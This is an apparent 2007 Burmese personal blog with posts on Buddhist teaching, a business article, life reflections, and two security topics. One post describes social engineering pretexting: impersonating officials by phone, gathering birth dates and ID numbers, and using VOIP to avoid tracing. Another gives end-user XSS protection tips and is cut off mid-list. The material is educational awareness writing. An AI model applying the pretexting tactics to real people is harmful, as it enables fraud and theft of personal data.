ကျွန်တော်ချစ်သောသူငယ်ချင်းများအတွက်
...: ပညာရေး၊စီးပွားရေး၊ ဘာသာရေး၊ ဂီတ၊ ရုပ်ရှင်၊ စာပေ၊ နည်းပညာ၊ အိုင်တီ၊ ကူးယူရန်ဆော့ဖ်ဝဲလ်များနဲ့ အခြားနေရာများကို ဒီနေရာလေးကနေ ဝေမျှပေးလိုက်ပါတယ် :...

... BE PEACEFUL AND HAPPY ALL THE MOMENTS, ALL MY FRIENDS ...

Jul 28, 2007

ရဟန်းတစ်ပါး၏ တန်ဘိုး


ဒီနေ့ ၀ါဆိုလပြည့်နေ့ ဖြစ်ပါတယ် ...
လပြည့်နေ့ ဆိုတော့ ဗုဒ္ဓဘာသာတို့ အနေနဲ့ တရား ဘာဝနာ ဆောက်တည်၊ အားထုတ်၊ ပွားများခြင်း အလုပ်ကို ခါတိုင်းထက် ပိုလုပ်ဖြစ်လေ့ ရှိကြပါတယ်...
သူငယ်ချင်းတွေ အတွက် နာကြားဖြစ်တဲ့ တရားတော် တစ်ပုဒ်ကို ဝေမျှပေးလိုက်ပါတယ် ...
သီတဂူဆရာတော် အရှင်ဥာဏိဿရ” ဟောကြားတော်မူတဲ့ “ရဟန်းတစ်ပါး၏ တန်ဘိုး” တရားတော်ပါ...
အကြောင်းအရာ အချို့ကို ထုတ်နှုတ် ဖော်ပြထားတာ ဖြစ်ပါတယ် ...
အောက်ဘက်မှာ တရားတော် ကို ဒေါင်းလုဒ် ရယူနိုင်တဲ့နေရာလည်း ပေးထားပါတယ်...

မြတ်တာ ယုတ်တာကို ဘာနဲ့ ခွဲခြား မှာလဲ ...
မျိုးရိုးနဲ့ ခွဲမှာလား ... အကျင့် သီလနဲ့ ခွဲမှာလား ...
အနာဂါမ်လူပုဂ္ဂိုလ်သည် ယနေ့မှ ရှင်/ရဟန်း ဖြစ်သော ပုထုဇဉ် ရှင်/ရဟန်း ကို ရှိခိုးသင့်/မခိုးသင့် ...

လူ့အ၀တ်အစားကို မစွန့်လွှတ်နိုင်သေးဘဲ အိမ်မှာ နေသော သောတာပန်၊ အနာဂါမ် အစရှိသော လူပုဂ္ဂိုလ်များသည် ရဟန်းဘ၀၏ ဂုဏ်ကို ဆောင်ထားသော ပုထုဇဉ် ရှင်/ရဟန်းကို ရှိခိုးရသည်။
ပုထုဇဉ် ရှင်/ရဟန်း တွင်-
- ရဟန်း ဘ၀၏ ဂုဏ်အရည်အချင်း (၂၀) နှင့်
- အသွင် (၂) ပါး ရှိသည် -
(က) ဦးခေါင်းကို ပြောင်အောင် တုံး၍ထားခြင်း။ အလှအပ ပြင်ဆင်ချယ်သနေရသော ဦးခေါင်းရှိ ဆံပင်များကို ရိတ်ထားခြင်း။
(ခ) ဖန်ရည်ဆိုးသော အ၀တ်ကို ၀တ်ထားခြင်း။ လူတို့ကဲ့သို့ နူးညံ့သော အ၀တ်ကို မ၀တ်တော့ဘဲ အထိအတွေ့ ကြမ်းတမ်းသော အ၀တ်ကို ၀တ်ထားခြင်း။

အသွင်ပြောင်းထားခြင်းကြောင့် လူ့အသွင် အပြင်နှင့် တခြားစီ ဖြစ်လာသည်။ အသွင်နှစ်ပါး ပြောင်းလဲသွားလိုက်သည်နှင့် ပူဇော်ထိုက်သူ ဖြစ်လာသည်။ ထို့ကြောင့် အနာဂါမ် ပုဂ္ဂိုလ် ဖြစ်နေစေကာမူ လူဖြစ်နေပါက ပုထုဇဉ် ရဟန်း၏ အသွင်နှစ်ပါးကို ကြည့်ပြီး ရှိခိုးရသည်။
ရှိခိုး ပူဇော်ထိုက်သော အသွင်ရှိခြင်းကြောင့် ရှိခိုးရခြင်း ဖြစ်သည်။
ရဟန်း အသွင်သို့ ပြောင်းသွားသည့် သူများသည် ဘုရား အလိုကျ အသွင်အပြင်တွင် တည်နေပြီ ဖြစ်သည်။
ထို့ကြောင့် ဘုရား၏အလိုကျ အဖြစ်တွင် တည်နေသော ပုဂ္ဂိုလ်ကို ဘုရား၏အလိုကျ အဖြစ်တွင် မနေနိုင်သော ပုဂ္ဂိုလ်များက ရှိခိုး ထိုက်သည်။

ပုထုဇဉ်မျှသာ ဖြစ်သော်လည်း ရဟန္တာကြီးများနှင့် အသွင်တူသည့် အဖြစ်သို့ ရောက်နေပြီဖြစ်၍ ရှိခိုးထိုက်သည်။

ရဟန်း ဘ၀၏ ဂုဏ်အရည်အချင်းများ

ပုထုဇဉ်မျှသာ ဖြစ်သော်လည်း ရဟန္တာကြီးများနှင့် အတူ ရဟန်းထု အစည်းအဝေးသို့ ၀င်ရောက်ခွင့် ရှိသည်။ ထို့ကြောင့် ၀င်ရောက်ခွင့် မရှိသည့် အရိယာ ပုဂ္ဂိုလ်လူက ပုထုဇဉ်ရဟန်းကို ရှိခိုးထိုက်သည်။

အိမ်မှာနေသော လူများသည် အများဆုံး (၈)ပါးသီလသာ ဆောက်တည်နိုင်သည်။ ရှင်ရဟန်း ၏ သီလမှာ အကျဉ်း(၂၂၇)သွယ် ၊ အကျယ် ကုဋေ (၉၀၀၀)ကျော် ရှိသည်။ သီလနည်းသော အရိယာ ပုဂ္ဂိုလ်လူများဖြစ်၍ သီလ များသော ပုထုဇဉ်ရဟန်းများကို ရှိခိုးထိုက်သည်။

ရှင်ပြုပေးခြင်း၊ ရဟန်းခံပေးခြင်း၊ သိမ်သမုတ်ပေးခြင်းတို့မှာ ဘုရားသာသနာကို တိုးချဲ့ ခြင်း ဖြစ်သည်။
ရဟန်းတစ်ပါးတည်းမှ သာမဏေလောင်းပေါင်း မြောက်များစွာကို ရှင်သာမဏေ အဖြစ် ပြုပေး၊ဆောင်ရွက်ပေး နိုင်သည်။
ပုထုဇဉ် ရဟန်း (၄)ပါး ပေါင်းပြီး သိမ်ထဲတွင် ရှင်သာမဏေအဖြစ်မှ ရဟန်းပြုပေးခြင့် ဘုရားသာသနာတော်ကို တိုးချဲ့ စေနိုင်သော အရည်အချင်းရှိသည်။
ရဟန်းများ စုပေါင်းပြီး သိမ်သမုတ်ပေးနိုင်သည်။
လူဝတ်ကြောင်များက ထိုအလုပ်များကို မလုပ်နိုင်...
ဘုရားသာသနာတော်ကို တိုးချဲ့တော်မူသော ပုဂ္ဂိုလ်များကို ဘုရားသာသနာတော်ကို ကျယ်ပြန့်အောင် မလုပ်နိုင်သော ပုဂ္ဂိုလ်များက ရှိခိုးထိုက်သည်။

ရဟန်းသည် မိမိတတ်ထားသော ပိဋကတ်တော်များကို အဆက်ဆက် သင်ပေးနိုင်စွမ်းရှိသည်။ သာသနာ့ အဆက်အနွယ်ကို သယ်ဆောင်နိုင်စွမ်း ရှိသည်။ ငယ်စဉ် အိမ်ရှေ့မင်းသားဘ၀က မိမိကို ပညာသင်ပေးခဲ့သည့် ဆရာဖြစ်သူကို ရှင်ဘုရင် ဖြစ်လာသောအခါတွင်လည်း ရှိခိုးရသကဲ့သို့
အနာဂါမ်လူသားသည် မိမိကို အနာဂါမ်ဖြစ်အောင် တရားပြ လမ်းညွှန်ပေးသော ပုထုဇဉ် ရှင်ရဟန်းကို ရှိခိုးရသည်။

ရဟန္တာ ရှင်ရဟန်းသည် ရဟန်းဘ၀ဖြင့် သာသနာ့ဘောင်တွင် အသက်ရှည်ရှည် နေထိုင်နိုင်သည်။
လူဝတ်ကြောင်သည် အိမ်မှာ တရားကျင့်ရင်း ရဟန္တာ ဖြစ်သွားပါက ဖြစ်သောနေ့တွင်ပင် ရဟန်းဘောင်သို့ ပြောင်းနိုင်ကပြောင်း၊ မပြောင်းနိုင်က ထိုနေ့တွင်ပင် ပရိနိဗ္ဗာန် ပြုရသည်။

ရဟန်းဘ၀ ရရှိခြင်း၏ ထူးခြား လေးနက် မွန်မြတ်သော အကျိုးတရားများ ကို ကောင်းစွာ သိရှိနားလည် ထားခြင်းဖြင့် သာသနာတော်နှင့် ရဟန်းတော်များကို ပိုမိုကောင်းမွန် ရိုသေစွာ စောင့်ရှောက်၊ ကြည်ညို နိုင်မည် ဖြစ်ပေသည်။

-ရဟန်း တစ်ပါး၏ တန်ဘိုး တရားတော် - ရယူရန်

သူငယ်ချင်းများ အားလုံး ယခုထက်ပို၍ အမျိုး၊ ဘာသာ၊ သာသနာတော် အကျိုးကို ဆထက် ထမ်းပိုး တိုးတက် သယ်ပိုးနိုင်သူများ ဖြစ်နိုင်ကြပါစေဗျာ ...

Jul 27, 2007

အရှုံးမှသည် အောင်ပွဲဆီသို့- (CEO မဂ္ဂဇင်း)


တူဒေးမီဒီယာ အုပ်စု ကနေ ထုတ်ဝေတဲ့ စီအီးအိုမဂ္ဂဇင်း ထဲက ဆောင်းပါးတစ်ပုဒ်ပါ .....
ဒီမဂ္ဂဇင်းက တစ်လ တစ် ကြိမ်ထုတ်ဝေတာ ဖြစ်ပြီး အွန်လိုင်းကနေ ဖတ်လို့ ရပါတယ် ...
သုံးထားတဲ့ စာလုံးက “ မြစေတီ” ပါ။ အဲဒီမှာပဲ အလွယ်တကူ ဒေါင်းလုဒ် ချလို့ ရပါတယ် ...
နှစ်သက်မိတဲ့ ဆောင်းပါးလေး တစ်ပုဒ်ကို အမြည်း ဖော်ပြပေးလိုက်ပါတယ်..
အပြည့် အစုံဖတ်ချင်ရင်တော့ မူရင်း နေရာမှာ သွားဖတ်ဖို့ အတွက် “ လမ်းကြောင်း ” အောက်ဖက်မှာ ပေးထားပါတယ် ...

အခန်း (၁)

သာမန် ရွက်ကြမ်းရေကျိုပုဂ္ဂိုလ်တွေနဲ့ ထူးထူးချွန်ချွန် ဆောင်ရွက်တတ်သူတွေရဲ့ အဓိက ခြားနားချက်တွေက ဘာလဲ။

ဘယ်လိုပဲဖြစ်ဖြစ် ကျုပ်တို့အားလုံးဟာ အရှုံးသမားတွေပါပဲ။ အထူးသဖြင့် ကျုပ်တို့အထဲက အတော်ဆုံး ဆိုတဲ့လူတွေပေါ့ဗျာ။

ဂျေအမ်ဘားရီး

ထူးထူးချွန်ချွန် စွမ်းဆောင်နိုင်သူတွေဟာ အဲဒီလိုအခြေအနေမျိုး ဖြစ်လာဖို့ ဘယ်လိုအရာ တွေဟာ ဖန်တီးပေးသလဲ။ အချို့လူတွေက ဒုံးပျံတစ်ခုလို ကောင်းကင်ကို ထိုးတက် သွားချိန်မှာ၊ တချို့လူတွေက ဘာကြောင့်မြေကြီးပေါ်ကို ဇောက်ထိုးကျရတာလဲ။ ဒီလို အောင်မြင်မှု တွေရတာတွေဟာ ကံကောင်းလို့၊ နတ်ဒေ၀တာတွေ စောင်မလို့၊ ဒါမှမဟုတ် ထိကိုင်သမျှရေ ဖြစ်စေ ဆိုတဲ့ (လက်ဖျား ငွေသီးအောင် လုပ်နိုင်တဲ့) အရည်အသွေးမျိုး ရှိလို့ စသည်ဖြင့် ကိုယ်ကြိုက်သလို ပြောနိုင်ပါတယ်။ ဒါပေမဲ့ အမှန်အတိုင်းပြောရရင် တချို့ လူတွေဟာ အင်မတန်ကြီးမားတဲ့အခက်အခဲတွေကြားထဲမှာ မယုံကြည်နိုင်လောက်တဲ့ အောင်မြင်မှုတွေရအောင် ဆောင်ရွက် နိုင်ကြတဲ့ စွမ်းရည် ရှိတယ်ဆိုတာ တွေ့ရပါတယ်။

......................

ဘယ်အရာဟာ အောင်မြင်မှုရဲ့အခြေခံလဲ။
အောင်မြင်သူတွေနဲ့ မအောင်မြင်သူတွေရဲ့ကြားက ကွာခြားချက်က ဘာလဲ။ တချို့ပုဂ္ဂိုလ်တွေက အလွန့်အလွန်အောင်မြင်ပြီး တချို့ ပုဂ္ဂိုလ်တွေ ကျတော့ အရှုံးတွေနဲ့ချည်း ရင်ဆိုင်နေရတာ ဘာကြောင့်လဲ။


အပြည့်အစုံဆက်ဖတ်ချင်တယ်ဆိုရင်တော့ မူရင်းနေရာ ကို “ ဒီကနေ” သွားလို့ ရပါတယ် .....

Jul 26, 2007

လူမှုအင်ဂျင်နီယာ - Social Engineering


နာမည်လေးကတော့ အမိုက်စား၊ အပျံစား။ တကယ်လေ့လာ ကြည့်လိုက်တော့ ကွန်ပျုတာစနစ် လုံခြုံရေးနယ်ပယ်တွင် လူတွေကို နည်းမျိုးစုံနှင့် ယုံကြည်လာအောင် ဖန်တီး လှည့်စားပြီး အရေးကြီးသော အချက်အလက်များကို မိမိအတွက် အမြတ်ထုတ် နိုင်စေရန် အကြံအဖန်လုပ်သည့် နည်စနစ်များကို ပေါင်းစပ် ခေါ်ထားသည့် အမည် ဖြစ်နေသည်။
ဤအမည်ကို နိုင်ငံရေး သိပ္ပံ (political science) နယ်ပယ်တွင်လည်း ခပ်ဆင်ဆင် အသုံးပြုကြသည်။ လိမ်တာတော့ မဟုတ်။ အယူဝါဒရေးရာ ပိုင်းအရ လူအများအပေါ် လွှမ်းမိုးမှုရအောင် ကြိုးစားသော ဘာသာရပ် တစ်ခု ဖြစ်သည်။ Political engineering ဟုလည်းခေါ်သည်။ အသေးစိပ် သိလိုလျှင်တော့ဖြင့် -http://en.wikipedia.org/wiki/Social_engineering_%28political_science%29- တွင် လေ့လာနိုင်ပါသည်။

ကွန်ပျုတာ စနစ်လုံခြုံရေးနယ်ပယ်တွင် “လူမှုအင်ဂျင်နီယာ” အလုပ်များက သာမန်လိမ်လည် လှည့်ဖြားခြင်းမျိုး (Frud) ထက် အဆင့် အတန်းမြင့် သကဲ့သို့၊ အယုံသွင်းပြီးတပတ်ရိုက်ခြင်း (Confidence trick) နှင့်လည်း အနည်းငယ် ခြားနားသည်။ တစ်ဖက်သားကို အယုံသွင်း ရသည့် နေရာတွင်တော့ သုံးမျိုးလုံး အတော်များများတူညီမှု ရှိသည်။ သို့သော် လူမှုအင်ဂျင်နီယာ တစ်ယောက်က သားကောင် ထံမှ သတင်း အချက်အလက်များ ကိုရရှိစေရန် သို့မဟုတ် သားကောင်၏ ကွန်ပျုတာ စနစ်ကို ထိတွေ့ အသုံးပြုခွင့်ရစေရန် အတွက် အဓိက အားထုတ်ကြိုးပမ်း လေ့ရှိပြီး “သားကောင်”နှင့် မည်သည့်အခါတွင်မဆို မျက်နှာခြင်းဆိုင်တွေ့ခြင်း၊ လူချင်းတွေ့ခြင်း မရှိပေ။

နည်းစနစ်များ နှင့် အခေါ်အဝေါ်များ
“လူမှုအင်ဂျင်နီယာ နည်းစနစ်များ” အားလုံးသည် လူသားတို့၏ တွေးတောဆင်ခြင်မှု အပိုင်းမှ အားနည်းချက်များ ဖြစ်သော ဘက်လိုက်မှုများ၊ အစွဲများ (Cognitive biases) - အပေါ်တွင် အခြေခံ ထားသည်။ အဆိုပါ ဘက်လိုက်တတ်သော အားနည်းချက်များမှာ အဓိက အားဖြင့် အုပ်စု (၃) စု ရှိသည်။

  • ဆုံးဖြတ်ချက် ချခြင်း နှင့် အပြုအမူဆိုင်ရာ ဘက်လိုက်ခြင်းများ
    • ၃၀ ခု ရှိပါသည်။
    • ဥပမာ - Bandwagon effect - အခြားသောသူများ အားလုံးက လုပ်နေသော (သို့မဟုတ် ယုံကြည်နေသော) အရာဖြစ်၍ လိုက်လုပ်ခြင်း။
  • ဖြစ်နိုင်ချေ နှင့် ယုံကြည်မှု ဆိုင်ရာ ဘက်လိုက်ခြင်းများ
    • ၂၂ ခု ရှိပါသည်။
    • ဥပမာ - Positive outcome bias - ဖြစ်လာသော အကြောင်းအရာများအပေါ် အကောင်းများချည်း ဖြစ်လာမည်ဟု လိုသည်ထက် ပို၍ ခန့်မှန်းခြင်း။
  • လူမှု ဆိုင်ရာ ဘက်လိုက်ခြင်းများ
    • ၁၉ ခု ရှိပါသည်။
    • ဥပမာ - False consensus effect - အများက လက်ခံသတ်မှတ်ထားသည့် အခြေအနေထက် လူတစ်ဦး (သို့) အများကို ပို၍ ခန့်မှန်းခြင်း။
လူမှုအင်ဂျင်နီယာများသည် အထက်တွင် ဖော်ပြထားခဲ့သည့် ဘက်လိုက်တတ်သော ချွတ်ယွင်းချက်များကို နည်းအမျိုးမျိုးဖြင့် ပေါင်းစပ် အသုံးချကာ တိုက်ခိုက်မှုနည်းစနစ်များကို ဖော်ဆောင်ကြလေ့ရှိသည်။ ၄င်းတို့အနက်မှ အချို့ကို အောက်တွင် ဖော်ပြထားပါသည်။

၁. ယိုးမယ်ဖွဲ့ လှည့်စားခြင်း (Pretexting)
ဤနည်းစနစ်မှာ ကြိုတင် တီထွင် လုပ်ကြံဖန်တီး ထားသော အကြောင်းအရာ တစ်ခုကို အသုံးပြုလျက် ပစ်မှတ်ထားသော “ သားကောင်” ထံမှ
- လိုချင်သော အချက်အလက်များ ပေါ်ထွက်လာအောင် သို့မဟုတ်
- တစ်ခုခု ဆောင်ရွက်လာအောင် လှည့်ဖျား သွေးဆောင်သည့် ဆောင်ရွက်ချက် ဖြစ်သည်။
အများအားဖြင့် တယ်လီဖုန်းဖြင့် လုပ်ဆောင်တတ်ကြသည်။ သာမန် ရိုးစင်းသော လိမ်လည်မှုမျိုး မဟုတ်ဘဲ
- ကြိုတင် လေ့လာ စုံစမ်းထားသော အချက်အလက်များ၊
- အကွက်ချ စီစဉ်ထားသော လုပ်ကွက်များ နှင့်
- မွေးနေ့၊ နိုင်ငံသားအမှတ် ၊ နောက်ဆုံးပေးချေလိုက်သော ငွေစာရင်း စသည့် အရာတစ်ခုခုကို သိအောင် ပြုလုပ်ကာ
- အဆိုပါ အချက်အလက်များ နှင့် ပတ်သက်၍ တာဝန်ရှိသူတစ်ဦး အဖြစ် “သားကောင်” ကို အယုံသွင်း လှည့်စားခြင်း ဖြစ်သည်။

စီးပွားရေးလုပ်ငန်း တစ်ခုခုထံမှ ဖောက်သည်များနှင့် သက်ဆိုင်သော အချက်အလက်များ ဖွင့်ပြောလာအောင် လှည့်စားလိုသည့် အခါများတွင် ဤနည်းစနစ်ကို မကြာခဏ သုံးလေ့ရှိကြသည်။ အလွတ်စုံထောက်များ အနေဖြင့် တယ်လီဖုန်း မှတ်တမ်းများ၊ ၀န်ဆောင်မှု မှတ်တမ်းများ၊ ဘဏ်စာရင်းများ နှင့် အခြားသော အချက်အလက်များကို အငယ်တန်း ကုမ္ပဏီ ၀န်ထမ်းများ ထံမှ တိုက်ရိုက် နှိုက်ထုတ် လိုသည့်အခါတွင်လည်း ဤနည်းစနစ်ကို သုံးကြသည်။ ထို့နောက် ရလာသော အချက်အလက်များကို အခြေခံလျက် ပိုမို အဆင့်မြင့် တာဝန်ရှိသောသူများ (ဥပမာ - မန်နေဂျာ) ထံ ချဉ်းကပ်ကာ မိမိတို့ အနေဖြင့် ၄င်းအချက်အလက်များ၏ ပိုင်ရှင် အမှန်ဖြစ်ကြောင်း ထင်မြင်လာစေရန် အယုံသွင်းခြင်း (ငွေစာရင်း အမှတ်များ ပြောင်းလဲခြင်း၊ တိကျသော စာရင်း အမှန်များ တောင်းယူခြင်း) များ လုပ်ဆောင် တတ်ကြသည်။

အမေရိကားရှိ ကုမ္ပဏီအများစုသည် ဖောက်သည် တစ်ဦးကို မှန်/မမှန် စစ်ဆေးလိုသည့် အခါ ၄င်း၏ နိုင်ငံသား စိစစ်ရေးအမှတ် (Social Security Number)၊ မွေးနေ့ စသည့် အရာတစ်ခုနှစ်ခုကိုမျှသာ မေးပြီး အတည်ပြုလေ့ ရှိကြသည်။ အမှန်တကယ်အားဖြင့် အဆိုပါ အချက်အလက်များကို အများပြည်သူဆိုင်ရာ မှတ်တမ်းများ (ကိုယ်ခန္ဓာဆိုင်ရာ မှတ်တမ်းများ၊ လူဝင်မှုဆိုင်ရာ မှတ်တမ်းများ၊ အိမ်ခြံမြေ မှတ်တမ်းများ၊ ယာဉ်မောင်းနှင်မှု မှတ်တမ်းများ၊ ရာဇ၀တ်မှု မှတ်တမ်းများ - စသည်) ကို အင်တာနက်မှ အလွယ်တကူ ရယူနိုင်ပေသည်။ ဤစစ်ဆေးနည်းမှာ အလွန်ပင် ထိရောက်မှု ရှိပြီး နောက်ထပ် ပိုမို ကောင်းမွန်သော စစ်ဆေးရေးနည်းလမ်း တစ်ခုကို မတွေ့မချင်း အသုံးဝင်နေမည်သာ ဖြစ်သည်။

ယိုးမယ်ဖွဲ့ လှည့်စားခြင်းနည်းများ ကို
  • အစုအစပ် လုပ်ငန်းများ၊ ရဲများ၊ ဘဏ်များ၊ အကောက်ခွန် နှင့် အာမခံလုပ်ငန်းများမှ တာဝန်ရှိသူများ - သို့မဟုတ်
  • အခြားတာဝန်ရှိသော တစ်ဦး တစ်ယောက်မဆို သို့မဟုတ်
  • ပစ်မှတ်ထားသည့် အကြောင်းအရာ နှင့်သက်ဆိုင်သည့် အဖြေ တစ်ခုခုရရှိနိုင်သူ တစ်ဦးကို
  • တယ်လီဖုန်းမှတဆင့် (လူချင်းမတွေ့ရဘဲ) အယောင်ဆောင် အယုံသွင်းလိုသည့် အခါ အများဆုံး အသုံးပြုကြသည်။
  • လှည့်စားသူ အနေဖြင့် “ပစ်မှတ်” မှ မေးလာနိုင်သော အကြောင်းအရာများ၊ မေးခွန်းများ အတွက် အဖြေများကို ကြိုတင် ပြင်ဆင် ထားလိုက်ရုံသာ ဖြစ်သည်။
  • အချို့ဖြစ်ရပ်များတွင် ဆိုလျှင်
    • ယောင်္ကျား/မိန်းမ အသံ အမှန်အတိုင်း ဖြစ်ရုံ၊
    • အရိုးသားဆုံး လေသံ အနေအထား နှင့်
    • ခြေထောက်ဖက် တောင်းပန်တော့မတတ် အပြောအဆို မျှလောက်နှင့် အလုပ် ဖြစ်သွားတတ်ကြလေသည်။
ခုနောက်ပိုင်းတွင် VOIP ပရိုဂရမ်များမှာ လှည့်စားသူများ၏ စံထား အသုံးပြုသော အရာတစ်ခု ဖြစ်လာသည်။ ခြေရာခံနိုင်လောက်သည့် ဂဏန်းများ၊ နံပါတ်များ ကျန်နေရစ်ခဲ့ခြင်း မရှိမှုသည်လည်း အချက်တစ်ခု ဖြစ်လာသည်။

ဆက်လက် ဖော်ပြပါမည် ....

ရည်ညွန်း -
-http://en.wikipedia.org/wiki/Social_engineering_%28security%29
-http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci531120,00.html
-http://www.securityfocus.com/infocus/1527
-http://en.wikipedia.org/wiki/List_of_cognitive_biases

Jul 24, 2007

ရှင်သန် နေထိုင်ခြင်း Living


မနေ့က သူငယ်ချင်းတစ်ယောက်ရဲ့ အီးမေးလ် ၀င်လာလို့ ဖတ်ကြည့်လိုက်တော့ မြင်တွေ့ရတဲ့ အကြောင်းအရာတွေကို ရောင်းရင်း တွေကိုလည်း မျှပေးချင်လာတဲ့အတွက် တဆင့်ပြန်ပြီး ဖော်ပြပေးလိုက်ပါတယ် ....
ကျွန်တော်တို့ ဘ၀တွေမှာ တခါတရံ စိတ်ညစ်စရာ မျိုးစုံနဲ့ ရင်ဆိုင် ကြုံတွေ့ကြရတဲ့ အခါ ခံစားချက် အမျိုးမျိုးဖြစ်ပေါ်လာ တတ်ကြတာ အမှန်ပါပဲ .... ဒါပေမယ့် အခုမြင်ရတဲ့ လူတွေလောက်တော့ မဆိုးသေးဘူးလို့ ထင်ပါတယ် ...




စိတ်မပျော် မရွှင် ဖြစ်နေသလား ... ဒီလိုလူတွေအတွက် ချန်ထားပါဦး .... သူတို့တွေ လောက်တော့ ကျွန်တော်တို့ အဖြစ် မဆိုးသေးပါဘူး




ကိုယ်လုပ်နေရတဲ့ လက်ရှိ အလုပ်က ဘယ်လိုပဲဖြစ်နေနေ ဒီကလေးလောက်တော့ ဆိုးမယ် မထင်ပါဘူးနော် ... ကြည့်ကြပါဦး ဗျာ



ကိုယ်ရတဲ့လစာရော အတော်လေး မကြေမနပ် ဖြစ်စရာ ကောင်းနေတယ်၊ နည်းပါးလွန်းနေတယ်၊ လုပ်ရတာနဲ့
ရနေတာနဲ့ မတန်လိုက်တာ ဆိုတဲ့ အတွေးလေးတွေ ပေါ်လာခဲ့ရင် ... ဒီထက်ပိုရမယ့် နေရာကို ပြောင်းနိုင်အောင် ကြိုးစားတာ ကောင်းတဲ့ အပြောင်း အလဲပါပဲ ....



ကိုယ့်ဘေးမှာ အပေါင်းအသင်း ရောင်းရင်းတွေ ဘယ်လောက်ပဲ များနေပါစေ ... အရေးကြုံရင် ကိုယ့်အပေါ် ကူညီတတ်တဲ့သူငယ်ချင်းမျိုးကိုတော့ ကျွန်တော်တို့ ရောင်းရင်းတို့ရဲ့ ဘ၀မှာ အမှန်တကယ် အရေးတကြီး လိုအပ်လှပါတယ် ....



စာတွေသင်နေရတာ ပညာတွေလေ့လာ ဆည်းပူးနေရတာ အရမ်းကို ၀န်ထုတ်ဝန်ပိုးတစ်ခုလို ဖြစ်နေပြီလား ... သူလေးကတော့ အားကြိုးမာန်တက် လေ့လာနေရှာလေရဲ့







ဒီလို အဖြစ်မျိုးတော့ ဘယ်သူမှ လိုချင်မှာ မဟုတ်တာ သေချာပါတယ် ...



ဒါရော
ဘယ်လိုသဘောမျိုးရပါသလဲ



ဒီလို သွားရေးလာရေး အလွန်ခက်ခဲတဲ့ နေရာတွေမှာ နေထိုင်နေ ရတဲ့ လူတွေရှိနေသေးတယ် ဆိုတာ သိထားရင် တခါတရံ ကြုံတွေ့ရတဲ့ ခရီးလမ်းပမ်း အဆင် မပြေတာလေးတွေကို အထိုက်အလျောက် သီးခံ နိုင်မှာပါ .....

လူ့အဖွဲ့အစည်းကို မမျှတဘူးလို့ မြင်လာမိတဲ့ အခါမျိုးတွေမှာ ...... . . .

အဆင်မပြေမှုဆိုတာ ဘ၀မှာ မကြာခဏ ကြုံတွေ့ရတတ်တဲ့ ဖြစ်လေ့ဖြစ်ထရှိတဲ့ အရာ တစ်ခုပါပဲ ... အဆင်မပြေတာလေးတွေကို ပြေလည်သွားအောင် ဖြေရှင်းလိုက်နိုင်တဲ့ အချိန်မျိုးမှာ ခံစားရတဲ့ ပျော်ရွှင်မှုလေးတွေက ပင်ပန်းခဲ့သမျှကို တစ်ခါတည်း ပြေပျောက်သွား စေတာ အမှန်ပါပဲ အဓိက အချက်ကတော့ ဘာပဲဖြစ်လာဖြစ်လာ တည်တည်ငြိမ်ငြိမ်နဲ့ ရင်ဆိုင်ဖြေရှင်းသွားဖို့၊ ခေါင်းအေးအေးထားပြီး နည်းလမ်းရှာဖို့လို့ ကျွန်တော်ကတော့ ခံယူမိပါတယ် ...

Jul 22, 2007

XSS သို့မဟုတ် Cross-Site Scripting - ကာကွယ်နည်းများ


XSS သို့မဟုတ် Cross-Site Scripting ရန်မှ ကာကွယ်မှုကို ဆောင်ရွက်သည့်အခါ Web Developer များဘက်မှ ၄င်းတို့၏ Web Site ကို XSS ပျော့ကွက်များ ဖြစ်ပေါ်မလာအောင် လိုအပ်သော အကာအကွယ်များဖန်တီးခြင်း၊ User များမှ ထည့်သွင်းလိုက်သော အချက်အလက်များကို စိစစ် လက်ခံခြင်း အစရှိသည့် ဆောင်ရွက်မှုများကို ပြုလုပ်ရသည်။ ထိုအပိုင်းကို ချန်ထားခဲ့ပြီး အင်တာနက် သုံးသူတစ်ဦး အနေဖြင့် XSS အန္တရာယ်မှ မည်သို့ အကာအကွယ်ပြုရမည်၊ ရှောင်တိမ်းရမည်ကို အဓိက ဖော်ပြသွားမည် ဖြစ်သည် -

၁. အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ ရွေးချယ်ခြင်း
အင်တာနက်ထဲတွင်လျှောက်သွားစဉ် မိမိအတွက် လုံခြုံမှုရှိစေရန် အကာအကွယ်ဖန်တီးသည့်အခါ တစ်ခုတည်းသော အရေးအကြီးဆုံး အရာမှာ မိမိအသုံးပြုမည့် အင်တာနက်ကြည့်ဆော့ဖ်ဝဲကို ရွေးချယ်ခြင်း ဖြစ်သည်။ အင်တာနက် သုံးသူ အများစုသည် အများအားဖြင့် အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ တစ်ခုထက် ပို၍ အသုံးပြုလေ့ရှိကြပြီး Website တစ်ခုကို ကြည့်သည့်အခါ ဆော့ဖ်ဝဲ တစ်ခုဖြင့် အဆင်မပြေလျှင် နောက်တစ်ခုဖြင့် ပြောင်းသုံးလေ့ ရှိကြသည်။ ဆော့ဖ်ဝဲ ရွေးချယ်သည့်အခါ သတိထားရမည့် အချက်တစ်ခုမှာ - တိုက်ခိုက်မှုများသည် အင်တာနက်သုံးနေသူ အများစုကို ပစ်မှတ်ထားသည် - ဟူသော အချက် ဖြစ်သည်။ လတ်တလော အခြေအနေတွင် Firefox ဆော့ဖ်ဝဲမှာ လူသုံးများသည့် ဆော့ဖ်ဝဲများထဲတွင် “ ပိုမို လုံခြုံသော ” အနေအထား တွင်ရှိပြီး၊ တိုက်ခိုက်သူများ၏ အဓိက ပစ်မှတ်မှာ မိုက္ကရိုဆော့ဖ်၏ Internet Explorer ဖြစ်နေသည်။ ထို့ပြင် Mozilla, Netscape, Opera, နှင့် Safari တို့ကိုလည်း ရွေးချယ် အသုံးပြုနိုင်သေးသည်။

-စိတ်ချစွာ အသုံးပြုနိုင်မည့် အင်တာနက်ကြည့် ဆော့ဖ်ဝဲ တစ်ခု (သို့) နှစ်ခုကို ရွေးပါ။


၂. အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ ကို ပိုမိုလုံခြုံအောင် ဖန်တီးခြင်း
မည်သည့် အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ ကိုရွေးချယ် အသုံးပြုသည်ဖြစ်စေ ၄င်းတို့ အတွက် အကာအကွယ်ပေးမည့် ပရိုဂရမ်များ နှင့် ကိရိယာ (Tools) များကို ထပ်မံပေါင်းစပ်ပေးခြင်းဖြင့် အင်တာနက်ကြည့် ဆော့ဖ်ဝဲကို ပိုမို လုံခြုံလာအောင် ဖန်တီးနိုင်သည်။

  • Firefox အတွက် - NoScript , SafeHistory, SafeCache,
